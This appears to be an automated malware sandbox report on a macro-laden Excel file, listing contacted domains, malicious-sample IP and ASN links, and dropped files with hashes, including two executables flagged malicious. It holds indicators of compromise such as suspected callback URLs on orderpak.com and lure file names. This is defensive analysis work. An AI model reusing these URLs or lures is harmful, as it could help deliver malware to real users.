skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net

Simulations

Behavior and APIs

Time	Type	Description
10:24:53	API Interceptor	1x Sleep call for process: fdcbn.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
50.87.232.245	vbc.exe	Get hash	malicious	Browse	www.orderpak.com/o56q/?ndlpdH=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNZV8y0sc/oD&v48p-=1bjHLJKXgdz49L7p
	INVOICE3DDH.exe	Get hash	malicious	Browse	www.orderpak.com/o56q/?KX6x=XDZ5Ijx4JZ1SrhRhc7OpDm0ljaIYV1kCiBPJSVnLvpP9fswQcjoWjLKpxNVVvi4vFvoVg+00xA==&LlZ=blyxBdiX2XMl58
	PI.xlsx	Get hash	malicious	Browse	www.orderpak.com/o56q/?NN=XDZ5Ijx9Je1Wrxdte7OpDm0ljaIYV1kCiBXZOW7KrJP8fdcWbz5a1PyryrVT3DgnJZc05A==&nN6896=K0GdBjl8wRId

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	documents_0084568546754.exe	Get hash	malicious	Browse	99.83.185.45
	client.exe	Get hash	malicious	Browse	52.216.129.123
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	34.251.18.29
	beacon4.exe	Get hash	malicious	Browse	13.35.43.85
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	13.248.196.204
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.141
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	13.224.195.167
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.142
	Jan_Order.html	Get hash	malicious	Browse	52.218.240.96
	IFS_1.0.69.apk	Get hash	malicious	Browse	13.224.94.101
	IFS_1.0.69.apk	Get hash	malicious	Browse	52.216.251.116
	open_office_2877604939.exe	Get hash	malicious	Browse	143.204.15.179
	KTFvWHZDMe.exe	Get hash	malicious	Browse	3.137.48.156
	sLUAeV5Er6.exe	Get hash	malicious	Browse	18.144.1.103
	GkrIJKmWHp.exe	Get hash	malicious	Browse	3.131.104.217
	mtsWWNDaNF.exe	Get hash	malicious	Browse	99.83.162.16
	NEW AGREEMENT 2021.xlsx	Get hash	malicious	Browse	35.159.22.77
	Signatures Required 21-01-2021.xlsx	Get hash	malicious	Browse	35.159.22.77
UNIFIEDLAYER-AS-1US	documents_0084568546754.exe	Get hash	malicious	Browse	108.179.242.70
	mr kesh.exe	Get hash	malicious	Browse	108.167.136.53
	79a2gzs3gkk.doc	Get hash	malicious	Browse	162.241.224.176
	INFO.doc	Get hash	malicious	Browse	162.241.224.176
	Electronic form.doc	Get hash	malicious	Browse	192.232.250.227
	file.doc	Get hash	malicious	Browse	162.241.253.129
	Payment_[Ref 72630 - joe.blow].html	Get hash	malicious	Browse	50.87.150.0
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	74.220.199.6
	request_form_1611306935.xlsm	Get hash	malicious	Browse	162.241.225.18
	file-2021-7_86628.doc	Get hash	malicious	Browse	162.241.253.129
	SecuriteInfo.com.Trojan.Dridex.735.31734.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.12612.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.4639.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.24961.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.6647.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.4309.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.30163.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.17436.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.15942.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.27526.dll	Get hash	malicious	Browse	198.57.200.100
AMAZON-02US	documents_0084568546754.exe	Get hash	malicious	Browse	99.83.185.45
	client.exe	Get hash	malicious	Browse	52.216.129.123
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	3.23.213.135
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	34.251.18.29
	beacon4.exe	Get hash	malicious	Browse	13.35.43.85
	Payment _Arabian Parts Co BSC#U00a9.exe	Get hash	malicious	Browse	13.248.196.204
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.141
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	13.224.195.167
	pan0ramic0.jpg.dll	Get hash	malicious	Browse	143.204.214.142
	Jan_Order.html	Get hash	malicious	Browse	52.218.240.96
	IFS_1.0.69.apk	Get hash	malicious	Browse	13.224.94.101
	IFS_1.0.69.apk	Get hash	malicious	Browse	52.216.251.116
	open_office_2877604939.exe	Get hash	malicious	Browse	143.204.15.179
	KTFvWHZDMe.exe	Get hash	malicious	Browse	3.137.48.156
	sLUAeV5Er6.exe	Get hash	malicious	Browse	18.144.1.103
	GkrIJKmWHp.exe	Get hash	malicious	Browse	3.131.104.217
	mtsWWNDaNF.exe	Get hash	malicious	Browse	99.83.162.16
	NEW AGREEMENT 2021.xlsx	Get hash	malicious	Browse	35.159.22.77
	Signatures Required 21-01-2021.xlsx	Get hash	malicious	Browse	35.159.22.77

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	creoagent.dll	Get hash	malicious	Browse	50.87.232.245
	creoagent.dll	Get hash	malicious	Browse	50.87.232.245
	case (426).xls	Get hash	malicious	Browse	50.87.232.245
	case (250).xls	Get hash	malicious	Browse	50.87.232.245
	rvYr7FRwkG.dll	Get hash	malicious	Browse	50.87.232.245
	case (1447).xls	Get hash	malicious	Browse	50.87.232.245
	case (850).xls	Get hash	malicious	Browse	50.87.232.245
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	50.87.232.245
	case (1543).xls	Get hash	malicious	Browse	50.87.232.245
	SecuriteInfo.com.FileRepMalware.dll	Get hash	malicious	Browse	50.87.232.245
	case_1581.xls	Get hash	malicious	Browse	50.87.232.245
	case (435).xls	Get hash	malicious	Browse	50.87.232.245
	case (426).xls	Get hash	malicious	Browse	50.87.232.245
	case (61).xls	Get hash	malicious	Browse	50.87.232.245
	BENVAV31BU.html	Get hash	malicious	Browse	50.87.232.245
	IRS_Covid_19_Relief_Grant_Document_docx.exe	Get hash	malicious	Browse	50.87.232.245
	Vivaldi.3.5.2115.87.x64.exe	Get hash	malicious	Browse	50.87.232.245
	8776139.docm	Get hash	malicious	Browse	50.87.232.245
	TeamViewer 14.exe	Get hash	malicious	Browse	50.87.232.245

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132942
Entropy (8bit):	5.372914488710379
Encrypted:	false
SSDEEP:	1536:JcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:JrQ9DQW+zBX8P
MD5:	44355DEB0C1B73C85437AB6568BE399B
SHA1:	C3605F95A21EE0FC423D0CA88DBB1C673BAF3815
SHA-256:	83197247F581FA83C9A6ACCF821675A6848684EC8E97D9CE127C3E677F73A11C
SHA-512:	9CED4912422512B5CF0FFF78F7CA4BF8A00C72A0B287387878EF9E3CB21E1BA0340B096ACF1F280CF1D61944155F9AB8590508859DD2A41C39DDB68351AFCC32
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-25T09:23:29">.. Build: 16.0.13720.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\13B79D28.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5051E8F4.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\76CE0C65.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E715703.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	742003
Entropy (8bit):	4.747274159794167
Encrypted:	false
SSDEEP:	6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
MD5:	DC74FAE0ADA0A2426E77588E3797E040
SHA1:	956EB4FACF7A5BD5E35CFE97898B1D17FEC2643D
SHA-256:	C9AF52899F8EE20E384DE482B81CE82826AF9573C4A1A9C9B761B9C5126B2BB7
SHA-512:	6C4A2786E391D3B23495D2159C56D4C8A49EAC0D18F1FAF4820A1D4CF9C93A5DFEE01DE0D0FE5D9D302F8527061B55B34D650AD3C4704CD98D9962BA3E9603E2
Malicious:	true
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	741995
Entropy (8bit):	4.7473139310932195
Encrypted:	false
SSDEEP:	6144:Gb6aZQWqNNmRTKHkZnmHgl1gW9oLeN53f9Pa3JLkK9BOsJ:Gb6afqNNmRnZn79oKpCZL99h
MD5:	A19EB2AF842C2181E97A503707784E49
SHA1:	D31776ECE6747E05C2D1ADD21813FC5A2CC4B82C
SHA-256:	28F7B47F0A1BBC4037B9E177529FAE56DB286FBC44FEB310DD88603AEA9A7B08
SHA-512:	8EC63B04CC8C9CF7DB84110B3E0342AB880EECD5446C525C9C75199C30E0D9A92B55D9E117DADF3FB2B58698B0686DD57663FC3C21AB386E248D41BE5DDDCEBC
Malicious:	true
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...<..`.........."..................8.........@............................. ............`.................................................8Y..(............... ....9..h.......@....X..................................0...........p[...............................text............................... ..`.rdata..4...........................@..@.data...`6...........h..............@....pdata.. ............t..............@..@.00cfg..(...........................@..@.gehcont............................@..@_RDATA..............................@..@.reloc..@...........................@..B.................~....}.}~.x}..x.x.~}~.~....x.~..x.~.~}x...x...x.x..x.~..w..~...........}.}.}.}...}...}..x..}..~.~.....}x....x.....}.......}.}x.~...~.~...~.}.......}..~.~x......}..}..x.~....x.....x..x.}......}........x.}.}~....~.....}.....~}~...........~..

C:\Users\user\AppData\Local\Temp\6F910000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	17381
Entropy (8bit):	7.264686923554434
Encrypted:	false
SSDEEP:	384:LYqhYs7wu2+SlzY/7ksWuiMEi0pdzG7pIA7BnAyc/:7es7wNtzY/b/iMIz8pIANnAyc/
MD5:	3B3C0579601FACAFBD5CAE5871864B3A
SHA1:	DB051BA82B335D1296283D1F3713A1F5F60D753A
SHA-256:	4F8D7A6B17AC84B0654DB0F99E5C37F58DF2E3C2AB93E96A123F16BA6E82DCE7
SHA-512:	1E51D6CB214A061F736D02736A8575EE70B83C5C27F1BA57BBEDB392056F73C162EAF15BED4853C8472057036BD0FDB68FC78353FFADF8396ABE2E16734AC3C1
Malicious:	false
Reputation:	low
Preview:	.U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H..b.^........:.6\...#Q.%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...%g."...yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.644950793627764
Encrypted:	false
SSDEEP:	12:8eXUhtuElPCH2Aivb9cX+WrjAZ/2bDYUmnRLC5Lu4t2Y+xIBjKZm:8ZQiBcBAZiDUnI87aB6m
MD5:	4770F5BB80BF5889E8E10D8B597E19A8
SHA1:	FE938E245152A576834CAF55E37E5C487F999E92
SHA-256:	E2CDDBECAEEC1E728E82B55BB932C926ACD9B692F17836063919F8149C08C545
SHA-512:	0844CE30E4D9C1BDBC36CB87FD88BE9484AB4D898A638567AA5E2EE0D986F36D484AB423EF4CCCF455314100D91FB4AC967F9B03CBC080F2E6315F211B82E312
Malicious:	false
Reputation:	low
Preview:	L..................F........N....-...e\/G....e\/G....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..9R.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.9R......S....................$...h.a.r.d.z.....~.1.....9R...Desktop.h.......Ny.9R......Y..............>.......:.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......141700...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	299
Entropy (8bit):	4.7570137735443145
Encrypted:	false
SSDEEP:	6:djYOWwrpmHWwrpmOWwrpmHWwrpmOWwrpmHWwrpmOWwrpc:dMOWsmHWsmOWsmHWsmOWsmHWsmOWsc
MD5:	41D06DC056583FDF30DD901298348E41
SHA1:	6233DCDB67664B7B60D85836AFA188104853CB19
SHA-256:	2617DCDD1334A666016A28DC5AA4CEE89FEF0A9476FDF51FDBEAFB67A6F688AA
SHA-512:	FEB4CC703A4C5EDF12B5213429C74B54472CF31C19B3AF052AD4E09F0C206D7A43FD3B0325E4449FC492DCFE8F7E7C44A6BE559544782E04FC717DBE45806FF5
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..request_form_1611565093.xlsm.LNK=0..[misc]..request_form_1611565093.xlsm.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\request_form_1611565093.xlsm.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Mon Jan 25 17:23:31 2021, atime=Mon Jan 25 17:23:31 2021, length=17381, window=hide
Category:	dropped
Size (bytes):	4500
Entropy (8bit):	4.7103504144745445
Encrypted:	false
SSDEEP:	48:83HW+w1WB0B6p3HW+w1WB0B6p7iW+w1WB0B6p7iW+w1WB0B6:8XtB0KXtB0K7itB0K7itB0
MD5:	C017DA4D8CB6EE9FB276ADC4E484194D
SHA1:	1CE97DEDE19B793354B2CCF4530EBF9A9153BE53
SHA-256:	06E16E735F0AEE181A4F45C8FCF7D935290B078320B7CBD8FA439361A6D2A43C
SHA-512:	CF5958D3FB9C482E3AF7AB1ABDAF32FAE1354DCB5F7A62173649E2EDB53CFB899D71187558A0B3401CFDBCDEEED6C04D1720BC7368B0E48A8E3F3B6E02C0A316
Malicious:	true
Reputation:	low
Preview:	L..................F.... .......:...wa/G...wa/G....C...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..9R.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.9R......S....................$...h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.9R......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..D..9R. .REQUES~1.XLS..j......>Qvx9R.....h......................)..r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.5.6.5.0.9.3...x.l.s.m.......b...............-.......a...........>.S......C:\Users\user\Desktop\request_form_1611565093.xlsm..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.r.e.q.u.e.s.t._.f.o.r.m._.1.6.1.1.5.6.5.0.9.3...x.l.s.m.........:..,.LB.)...As...`.......X.......141700...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.

C:\Users\user\Desktop\10A10000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	17381
Entropy (8bit):	7.264686923554434
Encrypted:	false
SSDEEP:	384:LYqhYs7wu2+SlzY/7ksWuiMEi0pdzG7pIA7BnAyc/:7es7wNtzY/b/iMIz8pIANnAyc/
MD5:	3B3C0579601FACAFBD5CAE5871864B3A
SHA1:	DB051BA82B335D1296283D1F3713A1F5F60D753A
SHA-256:	4F8D7A6B17AC84B0654DB0F99E5C37F58DF2E3C2AB93E96A123F16BA6E82DCE7
SHA-512:	1E51D6CB214A061F736D02736A8575EE70B83C5C27F1BA57BBEDB392056F73C162EAF15BED4853C8472057036BD0FDB68FC78353FFADF8396ABE2E16734AC3C1
Malicious:	false
Reputation:	low
Preview:	.U.n.0....?..........C....I?.&..an.L...;..............pz..y..6.^\t..@...0....M.E4H..b.^........:.6\...#Q.%.....&.<...+..<..R. /'..R.@....!f..P......o..m...w...%g."...yE....j0Q?z..0eP.G..K.2c.."6.B..Lax.i}.\..Wdpx..m..WV+8..8.7....9l.~..fk..S.n..........a.....V.\W...9^.5w.s.....j%.z........W.T.#:..S....>.....K..@....W.#.....n@.1.*..'...........s. .....:..]....83...K.).mb .da.u....#w...J[7`.p.z..~.......PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$request_form_1611565093.xlsm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	495
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1
MD5:	28C0C942161F749E335A76E714AACA29
SHA1:	53D07F227E4A2F3AF5373958409A19DE1FA1CF9C
